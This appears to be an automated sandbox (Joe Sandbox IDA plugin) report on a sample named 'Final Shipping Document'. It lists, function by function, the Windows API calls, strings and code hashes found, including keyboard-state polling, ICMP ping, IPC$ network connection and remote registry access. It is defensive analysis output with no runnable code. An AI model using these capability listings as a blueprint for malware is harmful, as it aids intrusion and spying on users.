• Opcode ID: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
• Instruction ID: 10383beb601937148f7ac33d2ceff3f7cad851ce27fb6e5e4ce9d103433005e7
• Opcode Fuzzy Hash: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
• Instruction Fuzzy Hash: 51417C31144644AFDB215B389C88BBD3BF5EB16370F144699FAB2972E1D7B19842EB10
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C09717
• LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09720
  • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C09742
• LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09745
• MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C09866
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 747408836-2268648507
• Opcode ID: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
• Instruction ID: a608aea76454e3e4cfe74bd34181a7f357dbb5d2d3af4b86b9d41a73cf8eb75d
• Opcode Fuzzy Hash: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
• Instruction Fuzzy Hash: 10414F72804219AACF14EBE0CD86EEEB7B8EF16740F1440A5F50572092EF356F49DB61
APIs
  • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C007A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C007BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C007DA
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C00804
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C0082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C00837
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C0083C
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
• Instruction ID: 1b23f7332a91dd2a089fb6fa36484493de37607fd06dcf35ee7ef0e1a5fbbabc
• Opcode Fuzzy Hash: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
• Instruction Fuzzy Hash: 3D411972C14229ABCF15EBA4DC85EEDB7B8BF04750F554169E911B31A1EB345E04CBA0
APIs
• VariantInit.OLEAUT32(?), ref: 00C23C5C
• CoInitialize.OLE32(00000000), ref: 00C23C8A
• CoUninitialize.OLE32 ref: 00C23C94
• _wcslen.LIBCMT ref: 00C23D2D
• GetRunningObjectTable.OLE32(00000000,?), ref: 00C23DB1
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00C23ED5
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C23F0E
• CoGetObject.OLE32(?,00000000,00C3FB98,?), ref: 00C23F2D
• SetErrorMode.KERNEL32(00000000), ref: 00C23F40
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C23FC4
• VariantClear.OLEAUT32(?), ref: 00C23FD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                            • String ID:
                                                            • API String ID: 429561992-0
                                                            • Opcode ID: b8e9125d288273d813d5ec6d032f65f67e7d943441d236f4b77eaaaceba0446d
                                                            • Instruction ID: 9f5f07ad285fe05aed99fe187ee2399e6097b31c9fd3dd6e777e737b894f3421
                                                            • Opcode Fuzzy Hash: b8e9125d288273d813d5ec6d032f65f67e7d943441d236f4b77eaaaceba0446d
                                                            • Instruction Fuzzy Hash: 80C17671618351AFC700DF68D884A2BBBE9FF89748F10495DF99A9B250DB30EE05CB52
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00C17AF3
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C17B8F
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00C17BA3
                                                            • CoCreateInstance.OLE32(00C3FD08,00000000,00000001,00C66E6C,?), ref: 00C17BEF
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C17C74
                                                            • CoTaskMemFree.OLE32(?,?), ref: 00C17CCC
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00C17D57
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C17D7A
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C17D81
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C17DD6
                                                            • CoUninitialize.OLE32 ref: 00C17DDC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                            • String ID:
                                                            • API String ID: 2762341140-0
                                                            • Opcode ID: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                            • Instruction ID: 0c8d50c271c0d177dbf5100e69326934599bd6c384ebb28dd926aaa14122426d
                                                            • Opcode Fuzzy Hash: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                            • Instruction Fuzzy Hash: 93C12C75A04109AFCB14DF64C898DAEBBF5FF49304B148599F816DB261D730EE81DB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C35504
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C35515
                                                            • CharNextW.USER32(00000158), ref: 00C35544
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C35585
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C3559B
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C355AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CharNext
                                                            • String ID:
                                                            • API String ID: 1350042424-0
                                                            • Opcode ID: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                            • Instruction ID: 29ec1b69d9c06257b20f639e58d91bc3ca8ef4e8d88536e3ae29c6d9a780d873
                                                            • Opcode Fuzzy Hash: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                            • Instruction Fuzzy Hash: 5D618B71920608AFDF10DF95CC85AFE7BB9EB0A720F108145F925AA291D7749B81DFA0
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BFFAAF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00BFFB08
                                                            • VariantInit.OLEAUT32(?), ref: 00BFFB1A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BFFB3A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00BFFB8D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BFFBA1
                                                            • VariantClear.OLEAUT32(?), ref: 00BFFBB6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00BFFBC3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBCC
                                                            • VariantClear.OLEAUT32(?), ref: 00BFFBDE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBE9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
                                                            • Instruction ID: 5255023fa8642b312e561d6b6431156310d414f604a980a7bee255e8054cf72a
                                                            • Opcode Fuzzy Hash: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
                                                            • Instruction Fuzzy Hash: 64412135A0021A9FCF10DF64D894ABDBBB9EF48354F008065E955A7261DB34E945CF90
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00C09CA1
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C09D22
                                                            • GetKeyState.USER32(000000A0), ref: 00C09D3D
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C09D57
                                                            • GetKeyState.USER32(000000A1), ref: 00C09D6C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C09D84
                                                            • GetKeyState.USER32(00000011), ref: 00C09D96
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C09DAE
                                                            • GetKeyState.USER32(00000012), ref: 00C09DC0
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C09DD8
                                                            • GetKeyState.USER32(0000005B), ref: 00C09DEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: ed4e672c7993b58579e734bd83b6f020a651a3e8c8fd63c4b9680cb86b35789d
                                                            • Instruction ID: 1f10d532f3595921334dbd6d56fab6835015988e6cd30fe05f595c57e3173473
                                                            • Opcode Fuzzy Hash: ed4e672c7993b58579e734bd83b6f020a651a3e8c8fd63c4b9680cb86b35789d
                                                            • Instruction Fuzzy Hash: 8C41D6349447C969FF308764C8443B9BEA0EB11344F04805ADAE6565C3DBB49FC8C792
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00C205BC
                                                            • inet_addr.WSOCK32(?), ref: 00C2061C
                                                            • gethostbyname.WSOCK32(?), ref: 00C20628
                                                            • IcmpCreateFile.IPHLPAPI ref: 00C20636
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206C6
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206E5
                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00C207B9
                                                            • WSACleanup.WSOCK32 ref: 00C207BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 7767bd8b3e43072a0ad772deaa9a54d171d9bc9cdf87804aadcac5cff28eff3c
                                                            • Instruction ID: 32f53fc2779a8b52fadc0214dba9eb280aa9ef97272c50ab9c3270794964ee6c
                                                            • Opcode Fuzzy Hash: 7767bd8b3e43072a0ad772deaa9a54d171d9bc9cdf87804aadcac5cff28eff3c
                                                            • Instruction Fuzzy Hash: 03919D356082119FD320DF15D888F1ABBE0EF45718F2485AAF4699BAA3C770EE45CF91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharLower
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 707087890-567219261
                                                            • Opcode ID: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
                                                            • Instruction ID: da93edcc0b84195bd5f8e4667ed6ca49ba4759488904aafad1286b04ef03437b
                                                            • Opcode Fuzzy Hash: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
                                                            • Instruction Fuzzy Hash: 9D51D236A051279BCF24DF6CD8809BEB3E5BF65724B214229E426E76C4DB30DE48C790
                                                            APIs
                                                            • CoInitialize.OLE32 ref: 00C23774
                                                            • CoUninitialize.OLE32 ref: 00C2377F
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00C3FB78,?), ref: 00C237D9
                                                            • IIDFromString.OLE32(?,?), ref: 00C2384C
                                                            • VariantInit.OLEAUT32(?), ref: 00C238E4
                                                            • VariantClear.OLEAUT32(?), ref: 00C23936
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 636576611-1287834457
                                                            • Opcode ID: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
                                                            • Instruction ID: b4eeceaf1d7bd6579d85cc5f923f8ac2ab372f432cd680dcc2090afdca353b87
                                                            • Opcode Fuzzy Hash: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
                                                            • Instruction Fuzzy Hash: 5661D070608361AFD310DF64D888F6EB7E8EF49714F10081AF9959B691C774EE88CB92
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C133CF
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C133F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LoadString$_wcslen
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 4099089115-3080491070
                                                            • Opcode ID: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
                                                            • Instruction ID: fa734f54c6a6f440d89afe2d3a662f897c2285270a598ed646b78e15d0336db3
                                                            • Opcode Fuzzy Hash: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
                                                            • Instruction Fuzzy Hash: 05518071904209ABDF15EBE0CD82EEEB7B9EF05744F1440A5F505720A2EB356F98EB60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 1256254125-769500911
                                                            • Opcode ID: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
                                                            • Instruction ID: 4c4633b5693e491ebeae6250010b5ba8571c6f3b62d3f4c17522c494d4d0fcc1
                                                            • Opcode Fuzzy Hash: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
                                                            • Instruction Fuzzy Hash: 6241A432A001279ACB24DF7DC8905BEB7B5AFA1B54B244229F435DB2C4E732CE81C790
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C153A0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C15416
                                                            • GetLastError.KERNEL32 ref: 00C15420
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00C154A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
                                                            • Instruction ID: d7dbd440e434990d6d84e4907832d8a9b83b4c0e2a907faf1cf1262b18f7fbff
                                                            • Opcode Fuzzy Hash: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
                                                            • Instruction Fuzzy Hash: 9A318D75A00604DFCB10DF68C484BEEBBB4EB86305F148065E415DB292DB71DEC6EB90
                                                            APIs
                                                            • CreateMenu.USER32 ref: 00C33C79
                                                            • SetMenu.USER32(?,00000000), ref: 00C33C88
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C33D10
                                                            • IsMenu.USER32(?), ref: 00C33D24
                                                            • CreatePopupMenu.USER32 ref: 00C33D2E
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C33D5B
                                                            • DrawMenuBar.USER32 ref: 00C33D63
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0$F
                                                            • API String ID: 161812096-3044882817
                                                            • Opcode ID: 53b4b954e570449e36a7de1965f9b8d93be911f5a891535cb8b7d843c0f5499c
                                                            • Instruction ID: 7a5a8a435446e85c275c25dc7d2436ec980c1c6ef309e2584a4b1db1b0efea26
                                                            • Opcode Fuzzy Hash: 53b4b954e570449e36a7de1965f9b8d93be911f5a891535cb8b7d843c0f5499c
                                                            • Instruction Fuzzy Hash: 44415779A21209AFDB14CF64D888BAE7BB5FF49350F140029FA56A7360D730AA10DF94
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C33A9D
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C33AA0
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C33AC7
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C33AEA
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C33B62
                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C33BAC
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C33BC7
                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C33BE2
                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C33BF6
                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C33C13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
                                                            • Instruction ID: 7ff0a6847835e24355496c08d36167552d68ba840139c4702cb4886d08a1140f
                                                            • Opcode Fuzzy Hash: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
                                                            • Instruction Fuzzy Hash: 00617A75900248AFDB11DFA8CC81FEEB7F8EB09714F144199FA15A72A1C774AE81DB50
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00C0B151
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B165
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00C0B16C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B17B
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0B18D
                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B1A6
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B1B8
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B1FD
                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B212
